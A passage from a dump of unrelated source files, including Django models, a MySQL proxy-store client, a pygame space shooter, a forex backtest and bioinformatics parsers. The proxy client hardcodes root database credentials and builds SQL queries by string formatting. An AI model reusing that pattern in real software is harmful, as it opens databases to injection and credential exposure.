self.getResumo_aux('Despesa', itens)\n        return soma\n    \n    def __str__(self):\n        return self.descricao + ' [' + str(self.sistema) + ']'\n\nclass OrcamentoItem(models.Model):\n    class Meta:\n        verbose_name_plural = 'Itens do Orçamento'\n        indexes = [\n            models.Index(fields=['sistema', 'orcamento', 'categoria', 'subcategoria']),\n            models.Index(fields=['sistema', 'orcamento', 'conta']),\n            models.Index(fields=['sistema', 'orcamento', 'categoria', 'subcategoria', 'conta', 'outros_rec']),\n            models.Index(fields=['sistema', 'orcamento', 'outros_rec']),\n        ]\n\n    sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n    orcamento = models.ForeignKey(Orcamento, on_delete=models.CASCADE)\n    categoria = models.ForeignKey(Categoria, on_delete=models.PROTECT, blank=True, null=True)\n    subcategoria = models.ForeignKey(SubCategoria, on_delete=models.PROTECT, blank=True, null=True)\n    conta = models.ForeignKey(Conta, on_delete=models.PROTECT, blank=True, null=True)\n\n    valor_mensal = models.DecimalField('Valor Mensal', max_digits=10, decimal_places=2, default=0)\n    outros_rec = models.BooleanField('Outros de Receita', default=False)\n\n    history = HistoricalRecords()\n\n    def getValorTotal(self):\n        soma = OrcamentoItemMes.objects.filter(sistema=self.sistema, orc_item=self).aggregate(Sum('valor_extra'))['valor_extra__sum'] or 0\n        return (self.valor_mensal * 12) + soma\n    \n    def __str__(self):\n        desc = self.orcamento.descricao + ' - '\n        if self.conta:\n            desc = desc + self.conta.descricao\n        else:\n            if self.categoria:\n                desc = desc + self.categoria.descricao + '/'\n                if self.subcategoria:\n                    desc = desc + self.subcategoria.descricao\n                else: \n                    desc = desc + 'GERAL'\n            else: \n                desc = desc + 'OUTRAS ' + ('RECEITAS' if self.outros_rec else 'DESPESAS')\n        return desc + ' [' + str(self.sistema) + ']'\n\nclass OrcamentoItemMes(models.Model):\n    class Meta:\n        verbose_name_plural = 'Valores Extras Mensais do Item do Orçamento'\n        indexes = [\n            models.Index(fields=['sistema', 'orc_item', 'mes']),\n        ]\n\n    sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n    orc_item = models.ForeignKey(OrcamentoItem, related_name='orc_extras', on_delete=models.CASCADE)\n\n    mes = models.PositiveSmallIntegerField('Mês', default=0)\n    valor_extra = models.DecimalField('Valor Extra Mensal', max_digits=10, decimal_places=2, default=0)\n\n    history = HistoricalRecords()\n    \n    def __str__(self):\n        return str(self.orc_item) + ' - ' + str(self.mes)\n\n\n","sub_path":"planejamento/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"269143312","text":"\"\"\"\r\nDatabase functionality\r\n\"\"\"\r\n\r\nimport pymysql\r\n\r\n# Takes a table name; the database defaults to db=proxy\r\nclass DbClient(object):\r\n    def __init__(self, dbname):\r\n        self.conn = pymysql.connect(\r\n            host='localhost',\r\n            user='root',\r\n            password='123456',\r\n            db=\"proxy\",\r\n            charset='utf8')\r\n        self.cursor = self.conn.cursor()\r\n        self.name = dbname\r\n\r\n    # switch to another table\r\n    def change_table(self, name):\r\n        self.name = name\r\n\r\n    # fetch (and remove) one proxy\r\n    def get(self):\r\n        try:\r\n            sql = \"select proxy from {}\".format(str(self.name))\r\n            print(sql)\r\n            data = self.cursor.execute(sql)\r\n            if data == 0:\r\n                raise Exception(\"failed to fetch an IP\")\r\n            data = self.cursor.fetchone()\r\n            self.cursor.execute(\"DELETE FROM {} WHERE (proxy='{}')\".format(self.name, str(data[0])))\r\n            print(\"deleted \" + data[0])\r\n            return data[0]\r\n        finally:\r\n            # self.cursor.close()\r\n            self.conn.commit()\r\n\r\n    # 
insert a record\r\n    def put(self, proxy):\r\n        try:\r\n            # sql = \"insert into proxyip VALUES {}\".format(proxy)\r\n            self.cursor.execute(\"insert into {} VALUES (NULL, '{}')\".format(self.name, str(proxy)))\r\n            print(\"inserted \" + proxy)\r\n        finally:\r\n            # self.cursor.close()\r\n            self.conn.commit()\r\n\r\n    def delete(self, proxy):\r\n        try:\r\n            self.cursor.execute(\"DELETE FROM {} WHERE (proxy='{}')\".format(self.name, str(proxy)))\r\n            print(\"successfully deleted \" + proxy)\r\n        finally:\r\n            self.conn.commit()\r\n\r\n    # return all stored proxies as a list\r\n    def get_all(self):\r\n        try:\r\n            print(\"************\")\r\n            sql = \"select proxy from {}\".format(str(self.name))\r\n            self.cursor.execute(sql)\r\n            data = self.cursor.fetchall()\r\n            return [i[0] for i in data]\r\n        finally:\r\n            # self.cursor.close()\r\n            self.conn.commit()\r\n\r\n    # delete every row in the given table\r\n    def del_all(self, name):\r\n        try:\r\n            sql = \"DELETE FROM {}\".format(str(name))\r\n            self.cursor.execute(sql)\r\n        finally:\r\n            self.conn.commit()\r\n\r\n    def close_db(self):\r\n        self.conn.close()\r\n        print(\"closed table \" + self.name)\r\n\r\nif __name__ == '__main__':\r\n    gg = DbClient(\"raw_proxy_queue\")\r\n    b = \"9299.313.3.8338\"\r\n    # print(gg.get())\r\n    # gg.pop(\"134.249.182.98:7777\")\r\n    gg.put(\"9299.313.3.8338\")\r\n    gg.change_table(\"useful_proxy_queue\")\r\n    gg.put(b)\r\n    a = gg.get_all()\r\n    print(a)\r\n    # a = gg.get_all()\r\n    # print(a)\r\n    # print(b in a)\r\n\r\n    gg.close_db()\r\n\r\n","sub_path":"proxyIpSpider/Dbclient.py","file_name":"Dbclient.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"623582005","text":"import pandas as pd\r\n\r\nproducts = pd.DataFrame({ # build the DataFrame\r\n    \"分類\": [\"居家\", \"居家\", \"娛樂\", \"娛樂\", \"科技\", \"科技\"],\r\n    \"商店\": [\"家樂福\", \"頂好\", \"家樂福\", \"全聯\", \"頂好\",\"家樂福\"],\r\n    \"價格\":[11.42, 23.50, 19.99, 15.95, 55.75, 111.55],\r\n    \"測試分數\": [4, 3, 5, 7, 5, 8]})\r\nprint(products)\r\n\"\"\"\r\ndf = products.groupby(['商店','分類']).sum()\r\ndf = df.pivot_table(index='商店')\r\nprint(df)\r\n\"\"\"\r\nproducts.to_html(\"Ch9_5_2_01.html\")\r\n# call the pivot_table() method\r\n# pivot_table() reshapes the DataFrame from a given index, columns and values\r\n# below, the index is '分類', the columns are '商店' and the values are '價格'\r\npivot_products = products.pivot_table(index='分類',columns='商店',values='價格')\r\nprint(pivot_products)\r\npivot_products.to_html(\"Ch9_5_2_02.html\")","sub_path":"第九章 Pandas套件/Ch9_5_2.py","file_name":"Ch9_5_2.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"50621835","text":"\n\n# try:\n# \t# pass\n# \tf = open('abc.txt')\n# except Exception:\n# \tprint(\"sorry, this file does not exist\")\n\n\ntry:\n\t# pass\n\tf = open('text.txt')\n\t# varas = variable_not_exist\nexcept FileNotFoundError:\n\tprint(\"sorry, this file does not exist\")\nexcept Exception:\n\tprint(\"Sorry, something went wrong\")\n\nelse: \n\tprint(f.read())\n\tf.close()\nfinally:\n\t# always executes\n\tprint(\"Always executes\")","sub_path":"Core-Python-Exercise/try_catch.py","file_name":"try_catch.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"401971719","text":"from django.db import models\nfrom django.forms.models import model_to_dict\nfrom django.utils import timezone\nfrom django.utils.text import slugify\n\n\nclass InitialFullCleanOnSaveModels(models.Model):\n    def __init__(self, *args, **kwargs):\n        
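# Snapshot the field values as first loaded so clean() can later tell\n        # whether e.g. the status field actually changed (see _loaded_values).\n        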
super(InitialFullCleanOnSaveModels, self).__init__(*args, **kwargs)\n if not hasattr(self, \"_loaded_values\"):\n self._loaded_values = model_to_dict(self)\n\n def save(self, *args, **kwargs):\n self.full_clean()\n super(InitialFullCleanOnSaveModels, self).save(*args, **kwargs)\n self._loaded_values = model_to_dict(self)\n\n class Meta:\n abstract = True\n\n\nclass Article(InitialFullCleanOnSaveModels):\n DRAFT = 0\n PUBLISH = 1\n STATUS_CHOICES = (\n (DRAFT, \"draft\"),\n (PUBLISH, \"publish\")\n )\n\n title = models.CharField(\n max_length=100,\n unique=True,\n verbose_name=\"title\"\n )\n slug = models.SlugField(\n blank=True,\n default=\"\",\n editable=False,\n max_length=100,\n verbose_name=\"slug\"\n )\n content = models.TextField(\n verbose_name=\"content\"\n )\n status = models.PositiveSmallIntegerField(\n blank=True,\n choices=STATUS_CHOICES,\n default=DRAFT,\n verbose_name=\"status\"\n )\n published_on = models.DateTimeField(\n blank=True,\n editable=False,\n null=True,\n verbose_name=\"published on\"\n )\n modified_on = models.DateTimeField(\n auto_now=True,\n verbose_name=\"modified on\"\n )\n created_on = models.DateTimeField(\n auto_now_add=True,\n verbose_name=\"created on\"\n )\n\n class Meta:\n get_latest_by = 'published_on'\n ordering = ['-status', '-published_on']\n verbose_name = \"article\"\n verbose_name_plural = \"articles\"\n\n def clean(self, *args, **kwargs):\n self.slug = slugify(self.title)\n if self._state.adding:\n if self.status == self.PUBLISH:\n self.published_on = timezone.now()\n elif self.status == self.DRAFT:\n self.published_on = None\n else:\n if self.status == self.PUBLISH and (\n self._loaded_values['status'] != self.PUBLISH): # noqa\n self.published_on = timezone.now()\n elif self.status == self.DRAFT and (\n self._loaded_values['status'] != self.DRAFT): # noqa\n self.published_on = None\n","sub_path":"blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"584885254","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/footprint_tools/cutcounts.py\n# Compiled at: 2019-08-20 12:40:02\nimport pysam, numpy as np\nfrom collections import defaultdict\n\nclass ReadError(Exception):\n pass\n\n\nclass GenotypeError(Exception):\n pass\n\n\nclass bamfile(object):\n \"\"\"Class to access a BAM file (largely inspired/copied from Piper et al.)\"\"\"\n\n def __init__(self, filepath, min_qual=1, remove_dups=False, remove_qcfail=True, chunksize=1000, offset=(0, -1)):\n try:\n self.samfile = pysam.Samfile(filepath, 'rb')\n except:\n raise IOError('Cannot open BAM file: %s' % filepath)\n\n self.offset = offset\n self.CHUNK_SIZE = chunksize\n self.min_qual = min_qual\n self.remove_dups = remove_dups\n self.remove_qcfail = remove_qcfail\n\n def __validate_read(self, read):\n if self.remove_qcfail and read.is_qcfail:\n raise ReadError()\n if self.remove_dups and read.is_duplicate:\n raise ReadError()\n if read.mapping_quality < self.min_qual:\n raise ReadError()\n return read\n\n def __get_read_mate(self, read):\n fpos = self.samfile.tell()\n try:\n try:\n mate = self.samfile.mate(read)\n except ValueError:\n mate = None\n\n finally:\n self.samfile.seek(fpos)\n\n return mate\n\n def __read_pair_generator(self, chrom, start, end):\n read_dict = defaultdict(lambda : [None, None])\n for read in 
self.samfile.fetch(chrom, max(start - 10, 0), end + 10):\n try:\n self.__validate_read(read)\n if not read.is_paired:\n yield (\n read, None)\n else:\n if not read.is_proper_pair or read.is_secondary or read.is_supplementary:\n continue\n qname = read.query_name\n if qname not in read_dict:\n if read.is_read1:\n read_dict[qname][0] = read\n else:\n read_dict[qname][1] = read\n else:\n if read.is_read1:\n yield (\n read, read_dict[qname][1])\n else:\n yield (\n read_dict[qname][0], read)\n del read_dict[qname]\n except ReadError as e:\n continue\n\n return\n\n def __add_read(self, read, fw, rev):\n if read.is_reverse:\n a = int(read.reference_end) + self.offset[1]\n rev[a] = rev.get(a, 0.0) + 1.0\n else:\n a = int(read.reference_start) + self.offset[0]\n fw[a] = fw.get(a, 0.0) + 1.0\n\n def __lookup(self, chrom, start, end, flip=False):\n tmp_fw = {}\n tmp_rev = {}\n for read1, read2 in self.__read_pair_generator(chrom, max(start - 10, 0), end + 10):\n self.__add_read(read1, tmp_fw, tmp_rev)\n if read2:\n self.__add_read(read2, tmp_fw, tmp_rev)\n\n fw_cutarray = np.array([ tmp_fw.get(i, 0.0) for i in range(start, end) ])\n rev_cutarray = np.array([ tmp_rev.get(i, 0.0) for i in range(start, end) ])\n return {'+': rev_cutarray[::-1] if flip else fw_cutarray, \n '-': fw_cutarray[::-1] if flip else rev_cutarray}\n\n def __getitem__(self, interval):\n chrom = interval.chrom\n start = interval.start\n end = interval.end\n flip = True if interval.strand == '-' else False\n ret = self.__lookup(chrom, start, end, flip)\n return ret\n\n def __lookup_allelic(self, chrom, start, end, pos, ref, alt, flip=False):\n tmp_ref_fw = {}\n tmp_ref_rev = {}\n tmp_alt_fw = {}\n tmp_alt_rev = {}\n for read1, read2 in self.__read_pair_generator(chrom, max(start - 10, 0), end + 10):\n try:\n offset = pos - read1.reference_start\n s = read1.query_sequence[offset]\n mismatches = int(read1.get_tag('XM', with_value_type=False))\n if s == ref and mismatches <= 1:\n fw = tmp_ref_fw\n rev = tmp_ref_rev\n elif s == alt and mismatches <= 2:\n fw = tmp_alt_fw\n rev = tmp_alt_rev\n else:\n raise GenotypeError()\n self.__add_read(read1, fw, rev)\n if read2:\n self.__add_read(read2, fw, rev)\n continue\n except GenotypeError as e:\n continue\n except IndexError as e:\n pass\n\n if not read2:\n continue\n try:\n offset = pos - read2.reference_start\n s = read2.query_sequence[offset]\n mismatches = int(read2.get_tag('XM', with_value_type=False))\n if s == ref and mismatches <= 1:\n fw = tmp_ref_fw\n rev = tmp_ref_rev\n elif s == alt and mismatches <= 2:\n fw = tmp_alt_fw\n rev = tmp_alt_rev\n else:\n raise GenotypeError()\n self.__add_read(read1, fw, rev)\n self.__add_read(read2, fw, rev)\n continue\n except GenotypeError as e:\n continue\n except IndexError as e:\n pass\n\n ref_fw_cutarray = np.array([ tmp_ref_fw.get(i, 0.0) for i in range(start, end) ])\n ref_rev_cutarray = np.array([ tmp_ref_rev.get(i, 0.0) for i in range(start, end) ])\n alt_fw_cutarray = np.array([ tmp_alt_fw.get(i, 0.0) for i in range(start, end) ])\n alt_rev_cutarray = np.array([ tmp_alt_rev.get(i, 0.0) for i in range(start, end) ])\n return {ref: {'+': ref_rev_cutarray[::-1] if flip else ref_fw_cutarray, \n '-': ref_fw_cutarray[::-1] if flip else ref_rev_cutarray}, \n alt: {'+': alt_rev_cutarray[::-1] if flip else alt_fw_cutarray, \n '-': alt_fw_cutarray[::-1] if flip else alt_rev_cutarray}}\n\n def get_allelic_reads(self, interval, pos, ref, alt, flip=False):\n chrom = interval.chrom\n start = interval.start\n end = interval.end\n flip = True if 
interval.strand == '-' else False\n ret = self.__lookup_allelic(chrom, start, end, pos, ref, alt, flip)\n return ret","sub_path":"pycfiles/footprint_tools-1.0-py2.7-linux-x86_64/cutcounts.py","file_name":"cutcounts.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"494051388","text":"#!/usr/bin/python3\n\"\"\"\nUsing a rest api to grab employee tasks\n\"\"\"\n\nimport json\nimport requests\nfrom sys import argv\n\n\ndef get_user_info(id):\n \"\"\"\n grabs info from singular user based on input id\n \"\"\"\n r = requests.get(\n \"https://jsonplaceholder.typicode.com/users/{}\".format(id)).json()\n name = r[\"username\"]\n with open(\"{}.json\".format(id), \"w\") as output:\n data = {}\n data[str(id)] = []\n r = requests.get(\"https://jsonplaceholder.typicode.com/todos\").json()\n for indiv in r:\n if indiv[\"userId\"] == id:\n info = {}\n info[\"task\"] = indiv[\"title\"]\n info[\"completed\"] = indiv[\"completed\"]\n info[\"username\"] = name\n data[str(id)].append(info)\n json.dump(data, output)\n\n\nif __name__ == \"__main__\":\n get_user_info(int(argv[1]))\n","sub_path":"0x15-api/2-export_to_JSON.py","file_name":"2-export_to_JSON.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"252861465","text":"from pygame.sprite import Sprite\n\n\nclass PointsSprite(Sprite):\n def __init__(self, settings, screen, font, x, y, points_value):\n super(PointsSprite, self).__init__()\n self.settings = settings\n self.screen = screen\n self.font = font\n\n if points_value != 0:\n self.rect = self.font[\"0\"].get_rect()\n else:\n self.rect = self.font[\"1UP\"].get_rect()\n self.rect.x = x\n self.rect.y = y\n\n self.points_value = points_value\n self.expiration = 60\n\n def draw(self, x_offset):\n if self.points_value != 0:\n for x in range(0, len(str(self.points_value))):\n self.screen.blit(self.font[str(self.points_value)[x]],\n self.rect.move(x_offset + x * self.settings.scale[\"pixel_width\"] * 4, 0))\n else:\n self.screen.blit(self.font[\"1UP\"], self.rect.move(x_offset, 0))\n self.rect.y -= self.settings.scale[\"pixel_height\"]\n self.expiration -= 1\n if self.expiration <= 0:\n self.kill()\n","sub_path":"points_sprite.py","file_name":"points_sprite.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"647052353","text":"class Solution:\n\n def wordBreak3(self,s,dict):\n if not s:\n return 1\n if not dict:\n return 0\n\n n = len(s)\n wordLower = set([word.lower() for word in dict])\n dp = [0]*(n+1)\n dp[0]=1\n\n for i in range(1,n+1):\n for j in range(i):\n if s[j:i].lower() in wordLower:\n dp[i] += dp[j]\n\n return dp[n]\n\na = Solution()\ns = \"CatMat\"\ndict1 = [\"Cat\", \"Mat\", \"Ca\", \"tM\", \"at\", \"C\", \"Dog\", \"og\", \"Do\"]\n\nb = a.wordBreak3(s,dict1)\nprint(b)","sub_path":"lintcode/第九层/683_单词拆分3---.py","file_name":"683_单词拆分3---.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"57083733","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 26 15:03:02 2020\r\n\r\n@author: Rafael Valle\r\n\"\"\"\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport openDataBase\r\nimport addDate\r\nimport dropColumns\r\nimport formatDataBase\r\nimport numberContracts\r\nimport 
renameColumns\r\nimport tableResult\r\nimport savingResult\r\nimport showResult\r\nimport strategyBreakout\r\nimport perfomanceResults\r\n\r\n\r\n#List of all currencies that we want to backtest the breakout strategy\r\nassets = {'Currencies':[\"CADCHF\", \"CADJPY\", \"CHFJPY\", \"EURCAD\", \"EURCHF\", \"EURGBP\", \"EURJPY\", \"EURUSD\", \"GBPCAD\", \"GBPCHF\", \"GBPJPY\", \"GBPUSD\", \"USDBRL\", \"USDCAD\", \"USDCHF\", \"USDJPY\"],\r\n 'Value PIP in USD':[10.15, 8.99, 8.99, 6.90, 10.15, 11.55, 8.99, 10.00, 6.90, 10.15, 8.99, 10.00, 1.94, 6.90, 10.15, 8.99],\r\n 'Multiplier':[100000, 1000, 1000, 100000, 100000, 100000, 1000, 100000, 100000, 100000, 1000, 100000, 100000, 100000, 100000, 1000]}\r\n\r\nasset = pd.DataFrame.from_dict(assets)\r\n\r\ndirectory = \"C:\\\\Users\\\\rafae\\\\Desktop\\\\Dados de Mercado\\\\5M\\\\Currencies\\\\\"\r\n\r\nsave = \"C:\\\\Users\\\\rafae\\\\Desktop\\\\Dados de Mercado\\\\Scripts\\\\Strategies\\\\Momentum\\\\\"\r\n\r\nperformance = pd.DataFrame(columns = ['Market',\r\n 'Net Profit',\r\n 'Sharpe Ratio',\r\n 'Max DD',\r\n '# of Trades',\r\n '% Win',\r\n 'Avg. Win',\r\n 'Avg. Loss'])\r\n\r\nfor b in range(len(asset)):\r\n \r\n data = openDataBase.openDataBase(directory, asset[\"Currencies\"][b])\r\n \r\n start_date = \"2019-02-01 00:00:00\"\r\n end_date = \"2019-12-30 00:00:00\"\r\n \r\n data_format = formatDataBase.formatDataBase(data, start_date, end_date, asset[\"Multiplier\"][b])\r\n \r\n add_contract = numberContracts.numberContracts(data_format, asset[\"Value PIP in USD\"][b], 10000, 100)\r\n \r\n strategy = strategyBreakout.strategyBreakout(add_contract, asset[\"Currencies\"][b], 200, 2.5)\r\n \r\n results = showResult.showResult(strategy, asset[\"Value PIP in USD\"][b])\r\n \r\n savingResult.savingResult(results, asset[\"Currencies\"][b], save)\r\n \r\n performance.loc[b, \"Market\"] = asset[\"Currencies\"][b]\r\n performance[\"Net Profit\"][b] = perfomanceResults.netProfit(strategy)\r\n performance[\"Sharpe Ratio\"][b] = perfomanceResults.sharpeRatio(strategy)\r\n performance[\"Max DD\"][b] = perfomanceResults.maxDD(strategy)\r\n performance[\"# of Trades\"][b] = perfomanceResults.numberTrades(strategy)\r\n performance[\"% Win\"][b] = perfomanceResults.winningTrades(strategy)\r\n performance[\"Avg. Win\"][b] = perfomanceResults.avgWinning(strategy)\r\n performance[\"Avg. 
Loss\"][b] = perfomanceResults.avgLosing(strategy)\r\n\r\nadress_performance = save + \"Resume_Result_All.txt\"\r\nperformance.to_csv(adress_performance , index=False, sep = ';')","sub_path":"Breakout.py","file_name":"Breakout.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60803687","text":"#!/usr/bin/env python3\n\nimport sys\n\n\ndef help():\n\tprint('''\n\t\tUsage:\n\t\t------------\n\t\tmaker_gff_QI_parse.py -gff \n\n\t\tDescription:\n\t\t------------\n\t\tPrints the QI information from the attribute column of mRNA features in a\n\t\tMAKER-generated GFF3 as tab-delimited text with the following fields in the\n\t\tfollowing order:\n\n\t\tID\n\t\tAED (nucleotide AED)\n\t\teAED (exon AED)\n\t\tLength of the 5' UTR\n\t\tFraction of splice sites confirmed by an EST alignment\n\t\tFraction of exons that overlap an EST alignment\n\t\tFraction of exons that overlap EST or Protein alignments\n\t\tFraction of splice sites confirmed by a SNAP prediction\n\t\tFraction of exons that overlap a SNAP prediction\n\t\tNumber of exons in the mRNA\n\t\tLength of the 3' UTR\n\t\tLength of the protein sequence produced by the mRNA\n\n\t\tOptions:\n\t\t------------\n\t\t-gff\tPath to the gff file to parse\n\n\t\t''')\n\tsys.exit(0)\n\nargs = sys.argv\n\nif not '-gff' in args or len(args) != 3:\n\thelp()\n\nin_fl_pth = args[args.index('-gff') + 1]\n\nprint('ID\\tAED\\teAED\\t5\\'_UTR_len\\tfrac_ss_with_transcript_support\\tfrac_exons_with_transcript_support\\tfrac_exons_with_transc_or_prot_support\\tfrac_ss_with_SNAP_support\\tfrac_exons_with_SNAP_support\\tnum_exons\\t3\\'_UTR_len\\tprot_len')\n\nwith open(in_fl_pth) as in_fl:\n\tfor line in in_fl:\n\t\tif '\\tmRNA\\t' in line:\n\t\t\tfields = line.strip().split('\\t')\n\t\t\tattributes = fields[8].split(';')\n\t\t\tID = attributes[0].split('=')[1]\n\t\t\tAED = attributes[3].split('=')[1]\n\t\t\teAED = attributes[4].split('=')[1]\n\t\t\tQI = attributes[5].split('|')\n\t\t\tQI[0] = QI[0].split('=')[1]\n\t\t\tprint('{0}\\t{1}\\t{2}\\t{3}'.format(ID, AED, eAED, '\\t'.join(QI)))\n","sub_path":"various/maker_gff_QI_parse.py","file_name":"maker_gff_QI_parse.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327099588","text":"__author__ = \"Vanessa Sochat\"\n__copyright__ = \"Copyright 2021, Vanessa Sochat\"\n__license__ = \"Apache-2.0 OR MIT\"\n\nimport os\n\nfrom django.core.wsgi import get_wsgi_application\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"searchapp.settings\")\n\napplication = get_wsgi_application()\n","sub_path":"app/searchapp/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624471411","text":"import pygame\nimport sys\nimport random\nimport os\nimport pygame.transform\nfrom random import randrange, randint\nfrom engine import Game, GameState\nfrom pygame import draw, Color\nfrom pygame.sprite import Sprite, Group, spritecollide, spritecollideany\nfrom ui import Text, Button, Menu\nfrom util import SpriteSheet\nfrom pygame.mixer import Sound\n\n### Game Constants ###\nSCREEN_SIZE = [800, 650]\nINITIAL_POSITION = [(SCREEN_SIZE[0] / 2) - 100, SCREEN_SIZE[1] - 100]\nDEFAULT_TEXT_FONT = (None, 26)\nSUB_TITLE_FONT = (\"assets/Fonts/Coda-Regular.ttf\", 40)\nMAIN_TITLE_FONT = (\"assets/Fonts/BowlbyOne-Regular.ttf\", 
64)\nGAME_TITLE = \"Unreal Space\"\n\n### Game Objects ###\nclass Player(Sprite):\n def __init__(self, position = [0,0], score = 0, lifes = 100):\n Sprite.__init__(self)\n self.position = position\n self.image = pygame.image.load(\"assets/images/player.png\").convert()\n self.image.set_colorkey((0, 0, 0))\n self.rect = self.image.get_rect(topleft = self.position)\n self.score = score\n self.lifes = lifes\n self.missile = None\n self.hit_sound = Sound(\"assets/sound/187535-crash.ogg\")\n\n def update(self):\n self.rect.x, self.rect.y = self.position\n\n if self.missile != None:\n self.missile.update()\n\n def shot(self, screen):\n self.missile = Missile(self.position)\n self.missile.emit_shot_sound()\n return self.missile\n\n def hit(self):\n self.hit_sound.play()\n return PlayerHitAnimation(self)\n\nclass Missile(Sprite):\n def __init__(self, ship_pos):\n super(Missile, self).__init__()\n self.image = pygame.Surface([2, 10])\n self.image.fill([255, 255, 255])\n self.image.set_colorkey((0, 0, 0))\n self.rect = self.image.get_rect()\n self.rect.x = ship_pos[0] + 45\n self.rect.y = ship_pos[1] - 10\n self.sonido = pygame.mixer.Sound(\"assets/sound/laser4.wav\")\n\n def update(self):\n self.rect.y -= 10\n\n def emit_shot_sound(self):\n self.sonido.play()\n\nclass Asteroid(Sprite):\n def __init__(self, image_url, image_width, image_height, inset = None):\n super(Asteroid, self).__init__()\n self.sheet = SpriteSheet(image_url)\n self.images = self.sheet.images_by(image_width, image_height, Color(\"black\"), inset)\n self.current_frame = 0\n self.image = self.images[self.current_frame]\n self.rect = self.image.get_rect(\n top = randint(-100, 0),\n left = randint(0, SCREEN_SIZE[0]),\n width = image_width,\n height = image_height\n )\n self.frame_speed = 1.5\n self.animation_counter = 0\n\n def update(self):\n if self.animation_counter == (self.frame_speed - 1):\n self.current_frame = (\n (self.current_frame + 1) if self.current_frame < len(self.images) else 0\n )\n self.animation_counter = (self.animation_counter + 1) % self.frame_speed\n self.image = self.images[self.current_frame - 1]\n\n if self.rect.y > SCREEN_SIZE[1]:\n self.rect.y = 0\n self.rect.x = random.randint(0, SCREEN_SIZE[0])\n else:\n self.rect.y += self.speed\n\nclass Asteroid100Points(Asteroid):\n def __init__(self):\n super(Asteroid100Points, self).__init__(\n \"assets/images/100asteroid.png\", 64, 64, (15, 15, 30, 30)\n )\n self.points = 100\n self.speed = 1\n\n def update(self):\n self.speed = randint(1, 5)\n super(Asteroid100Points, self).update()\n\nclass Asteroid500Points(Asteroid):\n def __init__(self):\n super(Asteroid500Points, self).__init__(\n \"assets/images/200asteroid.png\", 240, 320, (40, 84, 80, 150)\n )\n self.speed = 3\n self.points = 600\n\n def update(self):\n self.speed = randint(3, 5)\n super(Asteroid500Points, self).update()\n\nclass PlayerHitAnimation(Sprite):\n def __init__(self, player):\n super(PlayerHitAnimation, self).__init__()\n self.player = player\n self.sheet = SpriteSheet(\"assets/images/Sprite_FX_Explosion_0042.png\")\n self.images = self.sheet.images_by(148, 148, (0, 0, 0))\n self.current_frame = 0\n self.frame_speed = 2\n self.animation_counter = 0\n self.image = self.images[self.current_frame]\n self.rect = self.image.get_rect(\n left = self.player.rect.x, top = self.player.rect.y\n )\n\n def update(self):\n if self.animation_counter == (self.frame_speed - 1):\n self.current_frame = (self.current_frame + 1) % len(self.images)\n self.animation_counter = (self.animation_counter + 1) % 
self.frame_speed\n\n self.image = self.images[self.current_frame - 1]\n self.rect = self.image.get_rect(\n left = self.player.rect.x, top = self.player.rect.y\n )\n\n if self.current_frame == len(self.images) - 1:\n self.kill()\n\nclass AsteroidExplosion(Sprite):\n def __init__(self, exploded_object):\n super(AsteroidExplosion, self).__init__()\n self.exploded_object = exploded_object\n self.sheet = SpriteSheet(\"assets/images/Sprite_FX_Explosion_0015.png\")\n self.images = self.sheet.images_at(\n [\n (52, 88, 118, 124), (268, 72, 136, 140), (480, 70, 158, 160),\n (699, 62, 172, 168), (914, 82, 186, 186), (1140, 46, 200, 190),\n (1106, 558, 246, 328)\n ],\n (0, 128, 0)\n )\n self.current_frame = 0\n self.image = self.images[self.current_frame]\n self.rect = self.image.get_rect(top = exploded_object.y, left = exploded_object.x)\n self.sound = Sound(\"assets/sound/Explosion-SoundBible.com-2019248186.wav\")\n\n def update(self):\n self.current_frame = (self.current_frame + 1) % len(self.images)\n self.image = self.images[self.current_frame - 1]\n self.rect = self.image.get_rect(\n topleft = (\n (self.exploded_object.x + self.exploded_object.width / 2) - (self.image.get_width() / 2),\n (self.exploded_object.y + self.exploded_object.height / 2) - (self.image.get_height() / 2)\n )\n )\n\n if self.current_frame == 0:\n self.kill()\n\n### Stages ####\nclass SplashScreen(GameState):\n def __init__(self):\n super(SplashScreen, self).__init__()\n self.font = pygame.font.Font(MAIN_TITLE_FONT[0], 54)\n self.title = self.font.render(GAME_TITLE, True, (229, 22, 22))\n self.title_rect = self.title.get_rect(x=(SCREEN_SIZE[0] / 2) - 220, y=80)\n self.persist[\"screen_color\"] = \"black\"\n self.next_state = 